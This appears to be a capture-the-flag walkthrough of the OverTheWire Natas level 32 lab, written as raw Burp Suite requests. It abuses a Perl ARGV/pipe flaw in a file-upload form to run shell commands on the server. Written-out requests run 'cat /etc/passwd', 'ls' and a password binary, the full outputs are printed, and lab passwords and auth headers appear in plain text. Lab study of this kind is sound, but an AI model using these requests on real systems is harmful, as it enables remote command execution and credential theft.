PASSWORD: NaIWhW2VIrKqrc7aroJVHOZvk3RQMi0B

*BURP SUITE*
*TOGGLE INTERCEPT IS ON*

*WEB BROWSER*
URL: http://natas32.natas.labs.overthewire.org/
*BROWSE AND UPLOAD FILE CREATED ON PREVIOULY LEVEL natas30.py

*BURP SUITE*
*SEND TO REPEATER*
*TOGGLE INTERCEPT IS OFF*
*TOGGLE REPEATER*
POST /index.pl HTTP/1.1
Host: natas32.natas.labs.overthewire.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------119273343621758418833925484651
Content-Length: 668
Origin: http://natas32.natas.labs.overthewire.org
Authorization: Basic bmF0YXMzMjpOYUlXaFcyVklyS3FyYzdhcm9KVkhPWnZrM1JRTWkwQg==
Connection: close
Referer: http://natas32.natas.labs.overthewire.org/
Cookie: _ga_RD0K2239G0=GS1.1.1718037651.6.0.1718037651.0.0.0; _ga=GA1.1.54566035.1717921097
Upgrade-Insecure-Requests: 1

-----------------------------119273343621758418833925484651
Content-Disposition: form-data; name="file"; filename="natas30.py"
Content-Type: text/x-python

import requests

authentication = requests.auth.HTTPBasicAuth('natas30' , 'WQhx1BvcmP9irs2MP9tRnLsNaDI76YrH')

url = "http://natas30.natas.labs.overthewire.org/index.pl"

params = {"username":"natas31","password":["'ra6narok' or true",4]}

response = requests.post(url,data=params, auth=authentication)

print(response.text)

-----------------------------119273343621758418833925484651
Content-Disposition: form-data; name="submit"

Upload
-----------------------------119273343621758418833925484651--

*EDIT POST*

POST /index.pl?/bin/cat%20/etc/passwd%20| HTTP/1.1
Host: natas32.natas.labs.overthewire.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------119273343621758418833925484651
Content-Length: 505
Origin: http://natas32.natas.labs.overthewire.org
Authorization: Basic bmF0YXMzMjpOYUlXaFcyVklyS3FyYzdhcm9KVkhPWnZrM1JRTWkwQg==
Connection: close
Referer: http://natas32.natas.labs.overthewire.org/
Cookie: _ga_RD0K2239G0=GS1.1.1718037651.6.0.1718037651.0.0.0; _ga=GA1.1.54566035.1717921097
Upgrade-Insecure-Requests: 1

-----------------------------119273343621758418833925484651
Content-Disposition: form-data; name="file"  <----------COPY AND PASTE THE "filename" form-data block REMOVE ; filename="natas30.py"
Content-Type: application/octet-stream       <----------CHANGE CONTENT-TYPE TO APPLICATION/OCTET-STREAM

ARGV
-----------------------------119273343621758418833925484651
Content-Disposition: form-data; name="file"; filename="natas30.py"
Content-Type: text/x-python

ra6narok
-----------------------------119273343621758418833925484651
Content-Disposition: form-data; name="submit"

Upload
-----------------------------119273343621758418833925484651--

*RIGHT CLICK*
*SHOW RESPONSE IN BROWSER*
URL: http://natas32.natas.labs.overthewire.org/index.pl?/bin/cat%20/etc/passwd%20|
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:996:996:systemd Time Synchronization:/:/usr/sbin/nologin
dhcpcd:x:100:65534:DHCP Client Daemon			:/usr/lib/dhcpcd:/bin/false
messagebus:x:101:101::/nonexistent:/usr/sbin/nologin
syslog:x:102:102::/nonexistent:/usr/sbin/nologin
systemd-resolve:x:991:991:systemd Resolver:/:/usr/sbin/nologin
uuidd:x:103:103::/run/uuidd:/usr/sbin/nologin
tss:x:104:104:TPM software stack			:/var/lib/tpm:/bin/false
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
pollinate:x:106:1::/var/cache/pollinate:/bin/false
tcpdump:x:107:108::/nonexistent:/usr/sbin/nologin
landscape:x:108:109::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:990:990:Firmware update daemon:/var/lib/fwupd:/usr/sbin/nologin
polkitd:x:989:989:User for polkitd:/:/usr/sbin/nologin
ec2-instance-connect:x:109:65534::/nonexistent:/usr/sbin/nologin
_chrony:x:110:112:Chrony daemon			:/var/lib/chrony:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
mysql:x:111:113:MySQL Server			:/nonexistent:/bin/false
natas0:x:30000:30000:natas level 0:/home/natas0:/bin/bash
natas1:x:30001:30001:natas level 1:/home/natas1:/bin/bash
natas10:x:30010:30010:natas level 10:/home/natas10:/bin/bash
natas11:x:30011:30011:natas level 11:/home/natas11:/bin/bash
natas12:x:30012:30012:natas level 12:/home/natas12:/bin/bash
natas13:x:30013:30013:natas level 13:/home/natas13:/bin/bash
natas14:x:30014:30014:natas level 14:/home/natas14:/bin/bash
natas15:x:30015:30015:natas level 15:/home/natas15:/bin/bash
natas16:x:30016:30016:natas level 16:/home/natas16:/bin/bash
natas17:x:30017:30017:natas level 17:/home/natas17:/bin/bash
natas18:x:30018:30018:natas level 18:/home/natas18:/bin/bash
natas19:x:30019:30019:natas level 19:/home/natas19:/bin/bash
natas2:x:30002:30002:natas level 2:/home/natas2:/bin/bash
natas20:x:30020:30020:natas level 20:/home/natas20:/bin/bash
natas21:x:30021:30021:natas level 21:/home/natas21:/bin/bash
natas22:x:30022:30022:natas level 22:/home/natas22:/bin/bash
natas23:x:30023:30023:natas level 23:/home/natas23:/bin/bash
natas24:x:30024:30024:natas level 24:/home/natas24:/bin/bash
natas25:x:30025:30025:natas level 25:/home/natas25:/bin/bash
natas26:x:30026:30026:natas level 26:/home/natas26:/bin/bash
natas27:x:30027:30027:natas level 27:/home/natas27:/bin/bash
natas28:x:30028:30028:natas level 28:/home/natas28:/bin/bash
natas29:x:30029:30029:natas level 29:/home/natas29:/bin/bash
natas3:x:30003:30003:natas level 3:/home/natas3:/bin/bash
natas30:x:30030:30030:natas level 30:/home/natas30:/bin/bash
natas31:x:30031:30031:natas level 31:/home/natas31:/bin/bash
natas32:x:30032:30032:natas level 32:/home/natas32:/bin/bash
natas33:x:30033:30033:natas level 33:/home/natas33:/bin/bash
natas34:x:30034:30034:natas level 34:/home/natas34:/bin/bash
natas4:x:30004:30004:natas level 4:/home/natas4:/bin/bash
natas5:x:30005:30005:natas level 5:/home/natas5:/bin/bash
natas6:x:30006:30006:natas level 6:/home/natas6:/bin/bash
natas7:x:30007:30007:natas level 7:/home/natas7:/bin/bash
natas8:x:30008:30008:natas level 8:/home/natas8:/bin/bash
natas9:x:30009:30009:natas level 9:/home/natas9:/bin/bash 


*BURP SUITE*
*TOGGLE REPEATER*
*EDIT POST*

POST /index.pl?/bin/ls%20.%20| HTTP/1.1  <----------LS . - WILL SHOW ALL OF THE FILES IN THE CURRENT DIRECTORY
Host: natas32.natas.labs.overthewire.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------119273343621758418833925484651
Content-Length: 505
Origin: http://natas32.natas.labs.overthewire.org
Authorization: Basic bmF0YXMzMjpOYUlXaFcyVklyS3FyYzdhcm9KVkhPWnZrM1JRTWkwQg==
Connection: close
Referer: http://natas32.natas.labs.overthewire.org/
Cookie: _ga_RD0K2239G0=GS1.1.1718037651.6.0.1718037651.0.0.0; _ga=GA1.1.54566035.1717921097
Upgrade-Insecure-Requests: 1

-----------------------------119273343621758418833925484651
Content-Disposition: form-data; name="file"
Content-Type: application/octet-stream

ARGV
-----------------------------119273343621758418833925484651
Content-Disposition: form-data; name="file"; filename="natas30.py"
Content-Type: text/x-python

ra6narok
-----------------------------119273343621758418833925484651
Content-Disposition: form-data; name="submit"

Upload
-----------------------------119273343621758418833925484651--

*RIGHT CLICK*
*SHOW RESPONSE IN BROWSER*
URL: http://natas32.natas.labs.overthewire.org/index.pl?/bin/ls%20.%20|
natas32
.:
bootstrap-3.3.6-dist
getpassword
index-source.html
index.pl
jquery-1.12.3.min.js
sorttable.js
tmp 

*BURP SUITE*
*TOGGLE REPEATER*
*EDIT POST*

POST /index.pl?./getpassword%20| HTTP/1.1  <------CURRENT DIRECTORY BINARY FILE
Host: natas32.natas.labs.overthewire.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------119273343621758418833925484651
Content-Length: 505
Origin: http://natas32.natas.labs.overthewire.org
Authorization: Basic bmF0YXMzMjpOYUlXaFcyVklyS3FyYzdhcm9KVkhPWnZrM1JRTWkwQg==
Connection: close
Referer: http://natas32.natas.labs.overthewire.org/
Cookie: _ga_RD0K2239G0=GS1.1.1718037651.6.0.1718037651.0.0.0; _ga=GA1.1.54566035.1717921097
Upgrade-Insecure-Requests: 1

-----------------------------119273343621758418833925484651
Content-Disposition: form-data; name="file"
Content-Type: application/octet-stream

ARGV
-----------------------------119273343621758418833925484651
Content-Disposition: form-data; name="file"; filename="natas30.py"
Content-Type: text/x-python

ra6narok
-----------------------------119273343621758418833925484651
Content-Disposition: form-data; name="submit"

Upload
-----------------------------119273343621758418833925484651--

*RIGHT CLICK*
*SHOW RESPONSE IN BROWSER*
URL: http://natas32.natas.labs.overthewire.org/index.pl?./getpassword%20|
natas32
2v9nDlbSF7jvawaCncr5Z9kSzkmBeoCJ 
